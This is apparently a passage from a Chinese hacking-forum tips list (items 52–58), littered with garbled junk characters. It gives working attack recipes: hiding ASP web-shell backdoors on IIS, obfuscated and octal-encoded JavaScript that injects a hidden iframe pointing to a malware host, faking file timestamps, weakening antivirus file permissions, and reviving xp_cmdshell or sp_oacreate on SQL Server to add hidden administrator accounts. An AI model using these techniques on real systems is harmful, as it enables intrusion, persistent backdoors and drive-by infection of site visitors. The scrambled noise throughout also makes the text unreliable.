0 L9 ~) c+ G' b/ ^. [; Y% v8 E6 q3 |52、at "12:17" /interactive cmd# T/ N- q- S0 @9 |, e
执行后可以用AT命令查看新加的任务
3 s7 ^' R, Z' w' j# |0 D用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。( b6 a, D8 f) l2 c9 T4 ?* X
+ }' }, x+ g5 ]6 C) H8 y
53、隐藏ASP后门的两种方法) t" N- s# \4 K' J. ]! e7 `
1、建立非标准目录:mkdir images..\
6 {' O, e1 J! b" ~拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp7 z, X, m: h: C$ O2 a: ]  w/ Y  f" E
通过web访问ASP木马:http://ip/images../news.asp?action=login
1 c2 N+ h" S7 z4 U) C' ?( P如何删除非标准目录:rmdir images..\ /s
7 ]( _8 H5 u" Q! s7 a) }/ u2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
( ]4 R2 C$ C) g4 dmkdir programme.asp1 H2 Z7 b7 v( N. I7 U- X# Q1 m
新建1.txt文件内容:<!--#include file=”12.jpg”-->
* h; n' S( p5 `/ ^9 a  n6 I新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件9 V1 o8 t7 H& k+ X- E. }
attrib +H +S programme.asp
2 ]- [8 r1 F& N* l4 F通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
+ \+ D( s  {9 g+ M" f- K: @/ O; R1 J" I) P. y  {7 C2 O! o) w
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。1 {! M& K. b6 C- |0 z( e
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
! E# m9 @. B5 W( v6 I7 K0 k. A8 s. R. H9 y* a
55、JS隐蔽挂马1 M% q6 O0 F9 o, n1 m3 H
1.! _7 _& x" }8 q
var tr4c3="<iframe src=ht";  V7 ^- _+ Z0 X8 I
tr4c3 = tr4c3+"tp:/";' w- }8 U+ T8 C4 S
tr4c3 = tr4c3+"/ww";
$ Q( o6 H; L) {: _: K7 o3 c7 A3 Ctr4c3 = tr4c3+"w.tr4";
' n8 T" I4 U/ U8 T7 _5 E7 Btr4c3 = tr4c3+"c3.com/inc/m";
# j+ X( h# h: K8 H( }tr4c3 = tr4c3+"m.htm style="display:none"></i";
" w: V; D/ Z! K0 t  ctr4c3 =tr4c3+"frame>'";6 j0 L' K, l# g% u: K
document.write(tr4c3);; Z. W- B5 P) S! i4 U
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。7 g& w" I/ i. J* V, l

" k9 G' w' v, x& @4 ^2.+ k, F+ K$ V( f) o: H' c' t
转换进制,然后用EVAL执行。如* N4 W& e" b- S+ [& P! `( M
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");; p( F( Y0 a  ?9 G
不过这个有点显眼。7 }2 c) r+ q. a
3.$ A) D, C) n3 D
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
9 D4 z5 \1 I2 r5 w) a: B$ c最后一点,别忘了把文件的时间也修改下。# c  E7 Z1 Y# W, [, Q2 P
0 ~9 f+ p) f' s, I+ M% l
56.3389终端入侵常用DOS命令5 A0 K" L8 }% \/ c8 w
taskkill taskkill /PID 1248 /t/ i! N9 A1 T3 ]) W0 N

2 V5 h$ D/ O  G+ T4 \0 `tasklist 查进程9 r  i  p& p; q2 ]; |
6 Z$ z1 }( k: b% Q
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限3 h5 X" f  v6 I. H( b) t# E
iisreset /reboot6 D/ ]8 y7 S. P' c: |# C
tsshutdn /reboot /delay:1    重起服务器& b1 C8 c; x2 u$ b8 M+ s

$ t' I9 M, x$ D& [$ b+ S# m% ~( Qlogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,$ C( l- z( P9 C$ u

& [# ?4 U. ~# m8 c4 @1 F& vquery user 查看当前终端用户在线情况# u- w' L2 U+ r! `9 N  e1 Y, K

# X) W8 K0 l9 V) [; r1 T要显示有关所有会话使用的进程的信息,请键入:query process *
% Y; h3 \/ G) F9 y  o" e( p* O  Q, G
: B6 x; n/ ~; S- ]0 {, f3 m要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2. l% v8 b. ]- B1 r9 W' L0 M
0 l3 d, k2 y& J  {. U& D- {
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
7 @" `: q. c) o8 c8 n8 ]; }) J0 P/ |
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02: B5 W/ q. D2 c

) `9 i* I& k  m$ i% F/ q7 K命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
+ ?* I9 k2 Z4 B5 N, W9 q$ ~3 ]. I: i6 o( x! a
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统. F; L' w6 H2 U: r/ N2 p% e" \
, h" q, M- ?% A, e/ w
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
: z! Q4 }" f; I: Q5 Y4 h) O* \0 S1 q( x$ u
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机$ ]/ P4 W( X' S8 E! D: V7 R

% j. D* D+ p% C' J' T4 G$ f9 u; n56、在地址栏或按Ctrl+O,输入:
8 a" o2 R2 w$ V3 W% b) H$ Pjavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
! z3 J) J% [/ m% O( @: o/ Q7 Z( m! [
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。% s8 h% i3 ~' e$ _& w& y) g
9 B3 `$ A3 x1 s/ o, I) v$ H* r5 h
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
- t( N+ [+ ~, q8 \! z2 O0 ]& O用net localgroup administrators是可以看到管理组下,加了$的用户的。  p  t9 w; X. r% G6 Z( j1 l

/ g, I. G* C3 I7 }58、 sa弱口令相关命令
! I% \+ V5 {6 [. N) _# ?' z  [0 X
一.更改sa口令方法:3 t1 _6 g+ T0 i3 e, N9 f2 `7 J
用sql综合利用工具连接后,执行命令:
3 ^) L! u4 c2 E* \9 v: @5 n4 Nexec sp_password NULL,'20001001','sa'! \8 w8 F. v) [0 l6 i) B3 r5 w( p
(提示:慎用!)9 t9 `, s- u+ W6 O

2 T$ C9 Y8 s. j$ l' y; i7 e二.简单修补sa弱口令.9 o& g' e9 I  d+ ?: s* ~
, O. W9 H' Q8 y4 k" }, T8 v" I
方法1:查询分离器连接后执行:
4 \( i/ R, X* h* _: B' Vif exists (select * from. Y5 j1 }+ Z0 E7 w0 O8 [9 H
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
$ `' @7 C/ J* z, ?  gOBJECTPROPERTY(id, N'IsExtendedProc') = 1)7 ?' }; b* A) @/ H9 l& A

: E, q2 I; ^/ o+ @" ?8 eexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
3 ^3 m& M) u1 o0 v. K# i4 b, I4 H, P( R& u9 i0 b
GO
+ R! M0 s' p: y$ @  h* `: f6 `8 J2 O- N( k) J8 [
然后按F5键命令执行完毕  Z/ f/ E9 h% i' k/ i

2 Q5 F; P: `9 e4 Q0 Y$ r方法2:查询分离器连接后9 e7 C  M9 x$ n" ^  m
第一步执行:use master
6 Q3 f" e5 f# B5 n$ `3 L% B* f第二步执行:sp_dropextendedproc 'xp_cmdshell'5 |/ a" \8 ~$ y- j! k: B
然后按F5键命令执行完毕' E8 z8 B. V+ P3 ~

  w0 ^3 O. c3 D( E8 }$ V: H, a- W' F  z( l. M. n0 @2 m& I
三.常见情况恢复执行xp_cmdshell.# C- P% W8 S3 A1 @2 F: }& z2 E$ K

( v2 f* G7 [6 z4 P
9 ]4 l2 d( U; b  d0 ^1 W% V/ B1 未能找到存储过程'master..xpcmdshell'.! Q4 I. v6 q7 x7 B3 y# |
   恢复方法:查询分离器连接后,  H1 c5 K/ G, {4 h! x) [; D: w
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
! Z  S6 ^7 a+ W5 n- g! S, B第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'/ ~! c7 d- _1 _* W* o$ f8 e
然后按F5键命令执行完毕! G* F1 V) S" Q- Z0 q! b; O/ M0 A! j
: z  f0 Y/ v! X) L
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。), f6 F/ m3 n4 o
恢复方法:查询分离器连接后,. {0 v$ }9 D" a3 F& [# Q& h
第一步执行:sp_dropextendedproc "xp_cmdshell"- e. g- K8 y% q
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
* t) j' }. T6 Y9 _然后按F5键命令执行完毕: D; d1 Z# [( C; Y( M6 t
5 A9 Y0 ?5 p# E0 R& d
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
( \% H+ T& r3 Z$ j9 V恢复方法:查询分离器连接后,
9 V, C+ B! y6 i# y7 {& Z9 t! a第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
' k* i2 j: F+ @2 z0 r第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'           % F  ]9 {: z' m7 z& u
然后按F5键命令执行完毕% U# x0 ^" T9 a3 e
) U% w. C7 Q. [& D
四.终极方法." }; u9 J; O# o  x2 j9 G5 Y: T
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:7 B  V3 M2 w: L  v  e* F# S
查询分离器连接后,2 t" E* W9 s  R; Z1 Z! O# f# I2 _
2000servser系统:
8 p+ G1 i+ _) H; q' D" ydeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
* u" W' g7 `2 O+ o' t9 X, l# ~. M# d. ~1 Q- i+ ?
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'4 G% Y' M* X- p4 W

8 j( v- _- x" `  ]8 P# Exp或2003server系统:
6 \- E" p( j# H
6 ~; g5 h1 j6 r  m7 odeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
" [) {( k2 }4 i' i# z
  w& O$ h% i' x2 T: adeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
# C: O' H/ y# y2 n/ P




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2